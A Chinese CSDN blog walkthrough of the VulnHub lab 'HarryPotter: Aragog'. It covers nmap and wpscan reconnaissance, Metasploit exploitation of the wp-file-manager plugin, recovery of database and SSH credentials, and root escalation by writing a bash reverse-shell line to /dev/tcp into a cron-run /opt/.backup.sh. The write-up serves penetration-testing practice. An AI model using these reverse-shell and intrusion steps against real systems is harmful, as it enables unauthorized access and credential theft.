HarryPotter-Aragog 三部曲之第一部 靶场记录

已于 2023-09-07 16:31:57 修改
阅读量92 收藏
点赞数
文章标签: 网络安全 安全 系统安全 web安全
于 2023-08-04 17:06:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52729465/article/details/132097090
版权

信息收集

刚开始使用arp-scan -l扫描靶机ip时发现怎么扫都扫不出来,后来发现是靶机的网卡不一致,需要我们手动修改
参考https://blog.csdn.net/qq_51524329/article/details/121808404第三种方法
成功扫描到靶机ip192.168.91.130
在这里插入图片描述
进行常规扫描

nmap -sT --min-rate 10000 -p- 192.168.91.130
nmap -sT -sV -sC -O -p22,80 192.168.91.130
nmap --script=vuln -p22,80 192.168.91.130

在这里插入图片描述
在这里插入图片描述
打开web界面只有一张图片
在这里插入图片描述
目录爆破发现有个192.168.91.130/blog
在这里插入图片描述
页面比较奇怪,在/etc/hosts中添加域名解析查看是否有变化
在这里插入图片描述
页面有所变化
在这里插入图片描述
在Notice中我们得到提示,WordPress的plugins(插件)可能有问题使用wpscan扫描一下插件有无可利用的漏洞。
发现一个login界面
在这里插入图片描述
使用wpscan扫描网站(需要在wpscan官网注册一个账号获取免费的token)

wpscan --api-token=免费获取的token --url=http://192.168.91.130/blog -e p --plugins-detection aggressive
//
-e p :枚举插件
--plugins-detection aggressive:主动枚举插件,在Notice中我们得到提示,插件有可能有问题

得到很长一串信息,其中发现wp-file-manager存在3个漏洞
在这里插入图片描述

漏洞利用

使用msf查找RCE漏洞
设置RHOSTS、LHOST、TARGETURI
在这里插入图片描述
成功通过msf进入到www-root

shell //进入shell环境
python -c 'import pty;pty.spawn("/bin/bash")'//提升交互性

新知识点:
由于wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录下的config-default.php 文件,打开发现数据库的root用户密码
在这里插入图片描述

mysql -u root -p
//账号 root 密码mySecr3tPass

连接数据库
在这里插入图片描述
在这里插入图片描述

得到一组数据
hagrid98
$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
//通过MD5解密获得密码
password123

在这里插入图片描述
连接ssh成功拿到第一个horcrux1.txt
在这里插入图片描述

提权

通过翻阅目录查询到/opt目录下有个.backup.sh文件
在这里插入图片描述
在这里插入图片描述
//cp -r:cp -r既复制当前目录下的文件,也复制当前目录下的文件夹。
//cp -R:-R只复制当前目录下的文件,不复制当前目录下的文件夹。

直接进行反弹shell

echo 'bash -i >& /dev/tcp/192.168.91.128/6666 0>&1' >/opt/.backup.sh

在这里插入图片描述
kali端监听

nc -lvnp 6666

在这里插入图片描述

总结:

1、常规扫描靶机ip,开放22,80端口,进入web页面,发现只有一张图片。
2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。
3、根据提示,可能插件有问题,由于它是WordPress构建的网站,使用wpscan扫描(需要带token)查看是否有可利用漏洞
4、根据查看的可利用漏洞,我们通过msf进行搜索利用,成功连接进www-root。
5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;连入后发现了一个账号密码,密码经过MD5解密后成功使用ssh连入。
6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。
7、我们直接写入反弹shell后在kali端监听得到root权限,拿到horcrux

ke1yy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
harry-potter-spells:哈利·波特法术清单
05-22
$ yarn add harry-potter-spells 用法 const harryPotterSpells = require ( 'harry-potter-spells' ) console . log ( harryPotterSpells . random ( ) ) // => { "name": "Crucio", "type": "curse", "effect": ...
【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3146
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
vulnhub之 HarryPotter: Aragog (1.0.2)
qwweggfe的博客
08-30 345
靶机ip;192.168.181.145 kali ip: 192.168.181.129 首先进行ip扫描 打开网页进行查看 查看开启哪些端口 nmap -sC -sV 192.168.181.145 --min-rate=2000 -d 对目录进行扫描 打开/blog页面 发现notice无法进行跳转,修改/etc/hosts文件 然后在kali打开 ...
vulnhub_HARRYPOTTER: ARAGOG (1.0.2)
qq_45434762的博客
06-13 4822
主机信息kali: 192.168.1.12 Momentum:192.168.1.101 信息收集通过nmap扫描目标主机发现仅开放22、80端口nmap -T4 -A -v -p- 1...
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 436
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 494
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
HarryPotter-WebPage-Bootstrap
05-07
HarryPotter-WebPage-引导程序 使用此链接访问页面: :
express-fullCRUD-harrypotter-homework
04-29
不好了! 碰巧的是,魔术界中所有重要的巫师都是霍格沃茨巫术和巫术学校的学生,但是这所学校失去了所有魔术,现在...第1部分-设置数据库 在db/schema.sql ,为houses和students表添加CREATE DATABASE和CREATE TABLE方
Harry-Potter-Theme-Quiz
05-20
有一个30秒倒计时的计时器,如果选择了答案或在测验仍​​在进行时计时器减少到0,计时器将重置为30。 回答问题或计时器达到0时,将出现新问题。单击查看高分时,它将显示您进行此测验时获得的所有高分。 测验结束...
Harry-Potter-Web-Sitesi-:惠普网站
05-03
在项目中,`Harry-Potter-Web-Sitesi--main`可能代表的是项目的主要源代码文件夹。在这个文件夹里,我们通常会找到以下关键文件: 1. `index.html`: 这是网页的入口文件,包含HTML标记来定义网页的结构。例如,`...
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1375
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
No.124-HackTheBox-Linux-Aragog-Walkthrough渗透学习
qq_34801745的博客
06-05 383
** HackTheBox-Linux-Aragog-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/126 靶机难度:中级(4.8/10) 靶机发布日期:2018年7月21日 靶机描述: Aragog is not overly challenging, however it touches on several common real-world vulnerabilities, techniques and mis
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 533
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1245
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
python安全脚本开发简单思路
zhugedali_的博客
07-15 525
定制化报警策略:根据不同的安全事件类型和严重程度,制定个性化的报警策略,包括报警方式(邮件、短信、即时通讯、声光报警等)、接收人员(技术团队、管理层、相关业务部门)、报警内容(事件详情、影响评估、建议措施)。- 详细的错误日志记录:当捕获到异常时,记录详细的错误信息,包括错误类型、错误消息、发生时间、相关的上下文信息(如函数参数、变量值),以便后续的故障排查和分析。- 多层级的异常捕获:在不同的代码层次(函数级别、模块级别、主程序级别)设置异常捕获机制,确保能够捕获和处理各种类型的异常。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 826
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
飞睿智能UWB Tag蓝牙防丢器标签,宠物安全新升级,5cm精准定位测距不迷路
m0_59195407的博客
07-16 641
这意味着,无论你的宠物是在家中的某个角落捉迷藏,还是在公园的人海中穿梭,飞睿智能UWB Tag都能迅速锁定其位置,让你轻松找到它。想象一下,当晨光初破晓,你带着心爱的宠物踏上晨跑的旅程,手中轻轻握着的,不仅是牵引绳,更是对宠物安全的满满承诺。想象一下,即使在外忙碌,只需轻点手机,就能掌握宠物的一切动态,这种安心与便利,是任何传统防丢手段都无法比拟的。飞睿智能UWB Tag蓝牙防丢器,以其精准的定位、智能的功能、耐用的品质,成为了守护宠物安全的得力助手。用户见证:口碑的力量,爱的传递。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎云办公解决方案 3.0
最新发布
CSDN云计算
07-18 611
去确保性能体验流畅。与上一代产品相比,三擎云办公 3.0 新增 130+功能特性,不仅充分对标了主流云桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎云办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的云桌面办公系统环境。
Harry Potter 英文词频统计python代码
05-26
以下是一个简单的 Python 代码,用于统计《哈利波特》(Harry Potter第一部小说中单词的出现频率。需要注意的是,这个代码只是一个基础的示例,可能需要根据具体情况进行修改和优化。 ```python # 导入所需的库 import string # 打开文件并读取文本 with open('harry_potter.txt', 'r') as f: text = f.read() # 去除标点符号并转化成小写 text = text.translate(str.maketrans('', '', string.punctuation)).lower() # 将文本拆分为单词 words = text.split() # 创建一个字典来存储单词频率 word_freq = {} # 统计单词频率 for word in words: if word not in word_freq: word_freq[word] = 1 else: word_freq[word] += 1 # 打印最常见的单词 for word, freq in sorted(word_freq.items(), key=lambda x: x[1], reverse=True): print(f'{word}: {freq}') ``` 这个代码使用了 Python 的内置函数和库,包括: - `open` 函数用于打开文件; - `string` 模块中的 `punctuation` 常量用于获取标点符号; - `translate` 方法用于去除文本中的标点符号; - `lower` 方法用于将文本转化为小写; - `split` 方法用于将文本拆分为单词; - 字典用于存储每个单词出现的次数; - `sorted` 函数用于按照单词频率排序并打印结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值